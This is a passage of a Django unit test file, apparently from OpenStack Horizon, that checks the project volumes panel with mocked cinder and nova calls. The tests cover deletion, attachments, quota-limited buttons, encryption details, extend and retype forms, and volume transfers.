self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertIn("Scheduled deletion of Volume: Volume name",
[m.message for m in res.context['messages']])
self.mock_volume_list_paged.assert_called_with(
test.IsHttpRequest(), marker=None,
paginate=True, sort_dir='desc',
search_opts=None)
self.assertEqual(2, self.mock_volume_snapshot_list.call_count)
self.mock_volume_delete.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_server_list.assert_called_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(8, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_delete_volume_with_snap_no_action_item(self, mock_get,
mock_limits,
mock_quotas):
volume = self.cinder_volumes.get(name='Volume name')
setattr(volume, 'has_snapshot', True)
limits = self.cinder_limits['absolute']
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
self.assertNotContains(res, 'Delete Volume')
self.assertNotContains(res, 'delete')
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
@override_settings(OPENSTACK_HYPERVISOR_FEATURES={'can_set_mount_point':
True})
def test_edit_attachments(self, mock_get, mock_server_list):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
"attachment_id": ATTACHMENT_ID,
'instance': servers[0],
'device': '/dev/vdb',
'server_id': servers[0].id}]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
msg = 'Volume %s on instance %s' % (volume.name, servers[0].name)
self.assertContains(res, msg)
        # Asserting a length of 1 accounts for the single 'Choose Instance'
        # option; the instance the volume is already attached to is excluded.
form = res.context['form']
self.assertEqual(len(form.fields['instance']._choices),
1)
self.assertEqual(res.status_code, 200)
self.assertIsInstance(form.fields['device'].widget,
widgets.TextInput)
self.assertFalse(form.fields['device'].required)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
@override_settings(OPENSTACK_HYPERVISOR_FEATURES={'can_set_mount_point':
True})
def test_edit_attachments_auto_device_name(self, mock_get,
mock_server_list):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
"attachment_id": ATTACHMENT_ID,
'instance': servers[0],
'device': '',
'server_id': servers[0].id}]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
form = res.context['form']
self.assertIsInstance(form.fields['device'].widget,
widgets.TextInput)
self.assertFalse(form.fields['device'].required)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
def test_edit_attachments_cannot_set_mount_point(self, mock_get,
mock_server_list):
volume = self.cinder_volumes.first()
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
# Assert the device field is hidden.
form = res.context['form']
self.assertIsInstance(form.fields['device'].widget,
widgets.HiddenInput)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
def test_edit_attachments_attached_volume(self, mock_get,
mock_server_list):
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
server = servers[0]
volume = self.cinder_volumes.list()[0]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
self.assertEqual(res.context['form'].fields['instance']._choices[0][1],
"Select an instance")
self.assertEqual(len(res.context['form'].fields['instance'].choices),
2)
self.assertEqual(res.context['form'].fields['instance']._choices[1][0],
server.id)
self.assertEqual(res.status_code, 200)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_create_snapshot_button_attributes(self, mock_get,
mock_limits,
mock_quotas):
limits = {'maxTotalSnapshots': 2}
limits['totalSnapshotsUsed'] = 1
volume = self.cinder_volumes.first()
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
res_url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(res_url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
action_name = ('%(table)s__row_%(id)s__action_%(action)s' %
{'table': 'volumes', 'id': volume.id,
'action': 'snapshots'})
content = res.content.decode('utf-8')
self.assertIn(action_name, content)
self.assertIn('Create Snapshot', content)
self.assertIn(reverse('horizon:project:volumes:create_snapshot',
args=[volume.id]),
content)
self.assertNotIn('disabled', content)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_create_snapshot_button_disabled_when_quota_exceeded(
self, mock_get, mock_limits, mock_quotas):
limits = {'maxTotalSnapshots': 1}
limits['totalSnapshotsUsed'] = limits['maxTotalSnapshots']
volume = self.cinder_volumes.first()
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
res_url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(res_url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
action_name = ('%(table)s__row_%(id)s__action_%(action)s' %
{'table': 'volumes', 'id': volume.id,
'action': 'snapshots'})
content = res.content.decode('utf-8')
self.assertIn(action_name, content)
self.assertIn('Create Snapshot (Quota exceeded)', content)
self.assertIn(reverse('horizon:project:volumes:create_snapshot',
args=[volume.id]),
content)
self.assertIn('disabled', content,
'The create snapshot button should be disabled')
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_create_button_attributes(self):
limits = self.cinder_limits['absolute']
limits['maxTotalVolumes'] = 10
limits['totalVolumesUsed'] = 1
volumes = self.cinder_volumes.list()
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
volumes = res.context['volumes_table'].data
self.assertCountEqual(volumes, self.cinder_volumes.list())
create_action = self.getAndAssertTableAction(res, 'volumes', 'create')
self.assertEqual(set(['ajax-modal', 'ajax-update', 'btn-create']),
set(create_action.classes))
self.assertEqual('Create Volume', create_action.verbose_name)
self.assertEqual('horizon:project:volumes:create', create_action.url)
self.assertEqual((('volume', 'volume:create'),),
create_action.policy_rules)
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), sort_dir='desc', marker=None,
paginate=True, search_opts=None)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(9, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_create_button_disabled_when_quota_exceeded(self):
limits = self.cinder_limits['absolute']
limits['totalVolumesUsed'] = limits['maxTotalVolumes']
volumes = self.cinder_volumes.list()
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
volumes = res.context['volumes_table'].data
self.assertCountEqual(volumes, self.cinder_volumes.list())
create_action = self.getAndAssertTableAction(res, 'volumes', 'create')
self.assertIn('disabled', create_action.classes,
'The create button should be disabled')
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
paginate=True, sort_dir='desc',
search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(9, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_get'],
cinder: ['volume_snapshot_list',
'volume_get',
'tenant_absolute_limits'],
})
def test_detail_view(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
snapshots = self.cinder_volume_snapshots.list()
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
self.mock_volume_get.return_value = volume
self.mock_volume_snapshot_list.return_value = snapshots
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = reverse('horizon:project:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['volume'].id, volume.id)
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_server_get.assert_called_once_with(test.IsHttpRequest(),
server.id)
self.mock_tenant_absolute_limits.assert_called_once()
@mock.patch.object(cinder, 'volume_get_encryption_metadata')
@mock.patch.object(cinder, 'volume_get')
def test_encryption_detail_view_encrypted(self, mock_get, mock_encryption):
enc_meta = self.cinder_volume_encryption.first()
volume = self.cinder_volumes.get(name='my_volume2')
mock_encryption.return_value = enc_meta
mock_get.return_value = volume
url = reverse('horizon:project:volumes:encryption_detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res,
"Volume Encryption Details: %s" % volume.name,
2, 200)
self.assertContains(res, "<dd>%s</dd>" % volume.volume_type, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.provider, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.control_location, 1,
200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.cipher, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.key_size, 1, 200)
self.assertNoMessages()
mock_encryption.assert_called_once_with(test.IsHttpRequest(),
volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@mock.patch.object(cinder, 'volume_get_encryption_metadata')
@mock.patch.object(cinder, 'volume_get')
def test_encryption_detail_view_unencrypted(self, mock_get,
mock_encryption):
enc_meta = self.cinder_volume_encryption.list()[1]
volume = self.cinder_volumes.get(name='my_volume2')
mock_encryption.return_value = enc_meta
mock_get.return_value = volume
url = reverse('horizon:project:volumes:encryption_detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res,
"Volume Encryption Details: %s" % volume.name,
2, 200)
self.assertContains(res, "<h3>Volume is Unencrypted</h3>", 1, 200)
self.assertNoMessages()
mock_encryption.assert_called_once_with(test.IsHttpRequest(),
volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_get_data(self, mock_get, mock_limits, mock_quotas):
volume = self.cinder_volumes.get(name='v2_volume')
volume._apiresource.name = ""
mock_get.return_value = volume
mock_limits.return_value = self.cinder_limits['absolute']
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertEqual(volume.name, volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
api.nova: ['server_get'],
cinder: ['tenant_absolute_limits',
'volume_get',
'volume_snapshot_list'],
})
def test_detail_view_snapshot_tab(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
snapshots = self.cinder_volume_snapshots.list()
this_volume_snapshots = [snapshot for snapshot in snapshots
if snapshot.volume_id == volume.id]
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
self.mock_volume_get.return_value = volume
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
self.mock_volume_snapshot_list.return_value = this_volume_snapshots
url = '?'.join([reverse(DETAIL_URL, args=[volume.id]),
'='.join(['tab', 'volume_details__snapshots_tab'])])
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['volume'].id, volume.id)
self.assertEqual(len(res.context['table'].data),
len(this_volume_snapshots))
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_tenant_absolute_limits.assert_called_once()
@test.create_mocks({cinder: ['volume_get',
'message_list',
'volume_snapshot_list',
'tenant_absolute_limits']})
def test_detail_view_with_messages_tab(self):
volume = self.cinder_volumes.first()
messages = [msg for msg in self.cinder_messages.list()
if msg.resource_type == 'VOLUME']
snapshots = self.cinder_volume_snapshots.list()
self.mock_volume_get.return_value = volume
self.mock_message_list.return_value = messages
self.mock_volume_snapshot_list.return_value = snapshots
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = reverse(DETAIL_URL, args=[volume.id])
detail_view = tabs.VolumeDetailTabs(self.request)
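        # Build the ?tab=... query string for the messages tab via the tab
        # group itself so the parameter name matches what the view expects.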
messages_tab_link = "?%s=%s" % (
detail_view.param_name,
detail_view.get_tab("messages_tab").get_id())
url += messages_tab_link
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertContains(res, messages[0].user_message)
self.assertContains(res, messages[1].user_message)
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_tenant_absolute_limits.assert_called_once_with(
test.IsHttpRequest())
search_opts = {'resource_type': 'volume',
'resource_uuid': volume.id}
self.mock_message_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=search_opts)
@mock.patch.object(cinder, 'volume_get')
def test_detail_view_with_exception(self, mock_get):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
mock_get.side_effect = self.exceptions.cinder
url = reverse('horizon:project:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume(self):
volume = self.cinder_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': volume.description,
'bootable': False}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(
test.IsHttpRequest(), volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, volume.name, volume.description)
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, False)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume_without_name(self):
volume = self.cinder_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': '',
'description': volume.description,
'bootable': False}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, '', volume.description)
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, False)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume_bootable_flag(self):
volume = self.cinder_bootable_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': 'update bootable flag',
'bootable': True}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, volume.name,
'update bootable flag')
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, True)
@mock.patch.object(api.glance, 'get_image_schemas')
@mock.patch.object(cinder, 'volume_upload_to_image')
@mock.patch.object(cinder, 'volume_get')
def test_upload_to_image(self, mock_get, mock_upload, mock_schemas_list):
volume = self.cinder_volumes.get(name='v2_volume')
loaded_resp = {'container_format': 'bare',
'disk_format': 'raw',
'id': '741fe2ac-aa2f-4cec-82a9-4994896b43fb',
'image_id': '2faa080b-dd56-4bf0-8f0a-0d4627d8f306',
'image_name': 'test',
'size': '2',
'status': 'uploading'}
form_data = {'id': volume.id,
'name': volume.name,
'image_name': 'testimage',
'force': True,
'container_format': 'bare',
'disk_format': 'raw'}
mock_schemas_list.return_value = self.image_schemas.first()
mock_get.return_value = volume
mock_upload.return_value = loaded_resp
url = reverse('horizon:project:volumes:upload_to_image',
args=[volume.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_upload.assert_called_once_with(test.IsHttpRequest(),
form_data['id'],
form_data['force'],
form_data['image_name'],
form_data['container_format'],
form_data['disk_format'])
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_extend')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume(self, mock_get, mock_extend, mock_quotas):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 120}
mock_get.return_value = volume
mock_quotas.return_value = self.cinder_quota_usages.first()
mock_extend.return_value = volume
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once()
mock_extend.assert_called_once_with(test.IsHttpRequest(), volume.id,
formData['new_size'])
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume_with_wrong_size(self, mock_get, mock_quotas):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 10}
mock_get.return_value = volume
mock_quotas.return_value = self.cinder_quota_usages.first()
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormErrors(res, 1,
"New size must be greater than "
"current size.")
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once()
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_retype_volume_supported_action_item(self, mock_get,
mock_limits, mock_quotas):
volume = self.cinder_volumes.get(name='v2_volume')
limits = self.cinder_limits['absolute']
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertContains(res, 'Change Volume Type')
self.assertContains(res, 'retype')
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
cinder: ['volume_type_list',
'volume_retype',
'volume_get']
})
def test_retype_volume(self):
volume = self.cinder_volumes.get(name='my_volume2')
volume_type = self.cinder_volume_types.get(name='vol_type_1')
form_data = {'id': volume.id,
'name': volume.name,
'volume_type': volume_type.name,
'migration_policy': 'on-demand'}
self.mock_volume_get.return_value = volume
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_retype.return_value = True
url = reverse('horizon:project:volumes:retype',
args=[volume.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_retype.assert_called_once_with(
test.IsHttpRequest(), volume.id,
form_data['volume_type'], form_data['migration_policy'])
def test_encryption_false(self):
self._test_encryption(False)
def test_encryption_true(self):
self._test_encryption(True)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits'],
})
def _test_encryption(self, encryption):
volumes = self.cinder_volumes.list()
for volume in volumes:
volume.encrypted = encryption
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
rows = res.context['volumes_table'].get_rows()
column_value = 'Yes' if encryption else 'No'
for row in rows:
self.assertEqual(row.cells['encryption'].data, column_value)
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume_with_size_out_of_quota(self, mock_get, mock_quotas):
volume = self.cinder_volumes.first()
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 20)
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 1000}
mock_quotas.return_value = usage_limit
mock_get.return_value = volume
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormError(res, "form", "new_size",
"Volume cannot be extended to 1000GiB as "
"the maximum size it can be extended to is "
"120GiB.")
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
self.assertEqual(2, mock_quotas.call_count)
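    # The 120GiB ceiling asserted above is just the quota arithmetic set up in this
    # test: the 100GiB gigabytes quota minus the 20GiB already tallied leaves 80GiB of
    # headroom, and adding that to the fixture volume's current size (40GiB, implied
    # by the expected message) gives the 120GiB maximum new size.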
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits'],
})
def test_create_transfer_availability(self):
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
table = res.context['volumes_table']
# Verify that the create transfer action is present if and only if
# the volume is available
for vol in table.data:
actions = [a.name for a in table.get_row_actions(vol)]
self.assertEqual('create_transfer' in actions,
vol.status == 'available')
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(cinder, 'transfer_get')
@mock.patch.object(cinder, 'transfer_create')
def test_create_transfer(self, mock_transfer_create, mock_transfer_get):
volumes = self.cinder_volumes.list()
volToTransfer = [v for v in volumes if v.status == 'available'][0]
formData = {'volume_id': volToTransfer.id,
'name': 'any transfer name'}
transfer = self.cinder_volume_transfers.first()
mock_transfer_create.return_value = transfer
mock_transfer_get.return_value = transfer
# Create a transfer for the first available volume
url = reverse('horizon:project:volumes:create_transfer',
args=[volToTransfer.id])
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
mock_transfer_create.assert_called_once_with(test.IsHttpRequest(),
formData['volume_id'],
formData['name'])
mock_transfer_get.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'transfer_delete',
'tenant_absolute_limits'],
})
def test_delete_transfer(self):
transfer = self.cinder_volume_transfers.first()
volumes = []
# Attach the volume transfer to the relevant volume
for v in self.cinder_volumes.list():
if v.id == transfer.volume_id:
v.status = 'awaiting-transfer'
v.transfer = transfer
volumes.append(v)
formData = {'action':
'volumes__delete_transfer__%s' % transfer.volume_id}
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertNoFormErrors(res)
self.assertIn('Successfully deleted volume transfer "test transfer"',
[m.message for m in res.context['messages']])
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
search_opts=None, sort_dir='desc',
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_transfer_delete.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(8, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits',
'transfer_accept']
})
def test_accept_transfer(self):
transfer = self.cinder_volume_transfers.first()
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
formData = {'transfer_id': transfer.id, 'auth_key': transfer.auth_key}
url = reverse('horizon:project:volumes:accept_transfer')
res = self.client.post(url, formData, follow=True)
self.assertNoFormErrors(res)
self.mock_transfer_accept.assert_called_once_with(test.IsHttpRequest(),
transfer.id,
transfer.auth_key)
self.assertEqual(3, self.mock_tenant_absolute_limits.call_count)
self.mock_server_list.assert_called_once()
self.mock_volume_list_paged.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once()
self.mock_transfer_accept.assert_called_once()
@mock.patch.object(cinder, 'transfer_get')
def test_download_transfer_credentials(self, mock_transfer):
transfer = self.cinder_volume_transfers.first()
filename = "{}.txt".format(slugify(transfer.id))
url = reverse('horizon:project:volumes:'
'download_transfer_creds',
kwargs={'transfer_id': transfer.id,
'auth_key': transfer.auth_key})
res = self.client.get(url)
self.assertTrue(res.has_header('content-disposition'))
self.assertTrue(res.has_header('content-type'))
self.assertEqual(res.get('content-disposition'),
'attachment; filename={}'.format(filename))
self.assertEqual(res.get('content-type'), 'application/text')
self.assertIn(transfer.id, res.content.decode('utf-8'))
